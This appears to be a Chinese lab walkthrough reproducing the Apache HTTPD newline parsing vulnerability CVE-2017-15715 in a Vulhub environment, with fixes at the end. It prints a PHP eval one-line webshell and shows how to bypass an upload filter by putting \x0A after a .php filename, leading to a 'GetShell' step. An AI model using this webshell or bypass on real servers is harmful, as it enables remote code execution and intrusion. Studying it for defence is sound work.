【漏洞复现】Apache_HTTPD_换行解析漏洞(CVE-2017-15715)

这篇具有很好参考价值的文章主要介绍了【漏洞复现】Apache_HTTPD_换行解析漏洞(CVE-2017-15715)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规

说明 内容
漏洞编号 CVE-2017-15715
漏洞名称 Apache HTTPD 换行解析漏洞
漏洞评级 高危
影响范围 2.4.0~2.4.29
漏洞描述 在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略
修复方案 对上传文件重命名
过滤.php后缀文件
设备升级

1.1、漏洞描述

Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。

1.2、漏洞等级

1.3、影响版本

Apache HTTPD 2.4.0~2.4.29

1.4、漏洞复现

1、基础环境

Path:Vulhub/httpd/CVE-2017-15715


启动测试环境:

sudo docker-compose build
sudo docker-compose up -d

访问http://your-ip:{端口}/即可看到

【漏洞复现】Apache_HTTPD_换行解析漏洞(CVE-2017-15715),# 漏洞复现,apache,漏洞复现

2、漏洞扫描

【漏洞复现】Apache_HTTPD_换行解析漏洞(CVE-2017-15715),# 漏洞复现,apache,漏洞复现

3、漏洞验证

上传一句话木马1.phpbp拦截数据包

<?php
@eval($_REQUEST[6868]);
phpinfo();
?>

【漏洞复现】Apache_HTTPD_换行解析漏洞(CVE-2017-15715),# 漏洞复现,apache,漏洞复现

【漏洞复现】Apache_HTTPD_换行解析漏洞(CVE-2017-15715),# 漏洞复现,apache,漏洞复现

修改数据包

【漏洞复现】Apache_HTTPD_换行解析漏洞(CVE-2017-15715),# 漏洞复现,apache,漏洞复现

将1.php后面的\0x2e换成一个\x0A(注意,不能是\x0D\x0A,只能是一个\x0A

【漏洞复现】Apache_HTTPD_换行解析漏洞(CVE-2017-15715),# 漏洞复现,apache,漏洞复现

点击Send,返回响应码200

访问刚才上传的/1.php%0a,发现能够成功解析,但这个文件不是php后缀,说明目标存在解析漏洞

【漏洞复现】Apache_HTTPD_换行解析漏洞(CVE-2017-15715),# 漏洞复现,apache,漏洞复现

【漏洞复现】Apache_HTTPD_换行解析漏洞(CVE-2017-15715),# 漏洞复现,apache,漏洞复现

1.5、深度利用

GetShell

【漏洞复现】Apache_HTTPD_换行解析漏洞(CVE-2017-15715),# 漏洞复现,apache,漏洞复现

【漏洞复现】Apache_HTTPD_换行解析漏洞(CVE-2017-15715),# 漏洞复现,apache,漏洞复现文章来源地址https://www.toymoban.com/news/detail-743037.html

1.6、修复建议

  • 上传文件重命名
  • 禁止.php这样的文件执行
  • 升级版本

到了这里,关于【漏洞复现】Apache_HTTPD_换行解析漏洞(CVE-2017-15715)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Apache HTTPD 多后缀解析漏洞复现

    Apache HTTPD 支持一个文件拥有多个后缀,并为不同后缀执行不同的指令。比如,如下配置文件: 其给 .html 后缀增加了media-type,值为 text/html ;给 .cn 后缀增加了语言,值为 zh-CN 。此时,如果用户请求文件 index.cn.html ,他将返回一个中文的html页面。 以上就是Apache多后缀的特性

    2024年02月09日
    浏览(39)
  • Apache Struts2 S2-045远程命令执行漏洞(CVE-2017-5638)复现

    Apache Struts2是Apache项目下的一个web 框架,帮助Java开发者利用J2EE来开发Web相关应用。 Apache Struts2的Jakarta Multipart parser插件存在远程代码执行漏洞,攻击者可以在使用该插件上传文件时,修改HTTP请求头中的Content-Type值来触发该漏洞,导致远程执行代码。 Struts 2.3.5 – Struts 2.3.3

    2024年02月15日
    浏览(45)
  • 【漏洞复现】Apache_Tomcat_PUT方法任意写文件(CVE-2017-12615)

    感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规 说明 内容 漏洞编号 CVE-2017-12615 漏洞名称 Tomcat_PUT方法任意写文件 漏洞评级 高危 影响范围 Tomcat版本:8.5.19 漏洞描述 漏洞本质Tomcat配置了可写(readonly=false),导致我们可以往服务器写文件 修复方案

    2024年02月05日
    浏览(37)
  • 【Web】vulhub-httpd apache解析漏洞复现(1)

    目录 ①CVE-2017-15715 ②apache_parsing_vulnerability 贴出源码: 意思就是上传文件的后缀不能是php,php3,php4,php5,phtml,pht 我们看一下.htaccess配置文件  这段代码的作用是告诉 Apache 如何处理以 .php 结尾的请求,确保这些请求能够被正确地解释和执行 PHP 代码,并将结果返回给客户端。 这

    2024年02月04日
    浏览(38)
  • 【漏洞复现】Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)

    感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规 说明 内容 漏洞编号 CVE-2017-5645 漏洞名称 Log4j Server 反序列化命令执行漏洞 漏洞评级 高危 影响范围 Apache Log4j 2.8.2之前的2.x版本 漏洞描述 修复方案 1.1、漏洞描述 攻击者可以通过发送一个特别制作的2进

    2024年02月05日
    浏览(63)
  • Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)(漏洞复现详细过程)

    目录 一、漏洞介绍 二、漏洞环境搭建 三、漏洞利用 四、漏洞流量特征: CVE-2017-5645 是 Apache Log4j 服务器的一个反序列化命令执行漏洞,攻击者可以利用这个漏洞通过发送精心制作的请求,远程执行命令,从而危及服务器的安全。 进入漏洞目录文件,启动漏洞环境:docker-c

    2024年02月16日
    浏览(51)
  • apache漏洞复现-多后缀解析漏洞,换行解析漏洞,2.4.49,2.4.50

      目录 准备工作 Apache多后缀解析漏洞复现 漏洞复现 漏洞防御 Apache换行解析漏洞复现(CVE-2017-15715) 漏洞复现 漏洞防御 CVE-2021-41773 漏洞复现 CVE-2021-42013 漏洞复现 环境:下载docker 和 vulhub 安装包:蚁剑安装包(百度网盘 我的资源安装包蚁剑winlinux安装包AntSword-Loader-v4.0.3-w

    2024年02月15日
    浏览(42)
  • Apache httpd漏洞复现

    该漏洞与Apache、php版本无关,属于用户配置不当造成的解析漏洞。在有多个后缀的情况下,只要一个文件含有 .php 后缀的文件即将被识别成PHP文件,没必要是最后一个后缀。 启动upload-labs-env-win-0.1目录下的phpstudy,打开bp自带的浏览器,访问虚拟机的本机地址127.0.0.1,来到up

    2024年02月09日
    浏览(34)
  • Apache HTTPD 漏洞复现

    链接地址:Vulhub - Docker-Compose file for vulnerability environment。 1.1 漏洞描述 说明 内容 漏洞编号 无 漏洞名称 Apache HTTPD 多后缀解析漏洞 漏洞评级 高危 漏洞描述 在有多个后缀的情况下,只要一个文件含有.php后缀的文件即将被识别成PHP文件,没必要是最后一个后缀。利用这个特性

    2024年02月09日
    浏览(42)
  • CVE-2017-7921漏洞复现

    0x01 CVE-2017-7921漏洞复现 许多HikvisionIP摄像机包含一个后门,允许未经身份验证的模拟任何配置的用户帐户。 0x02 漏洞复现: 利用工具发现漏洞(CVE-2017-7921): 利用路径:/Security/users?auth=YWRtaW46MTEK 附:检索所有用户及其角色的列表 利用路径:/onvif-http/snapshot?auth=YWRtaW46MTEK 附

    2024年02月12日
    浏览(44)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包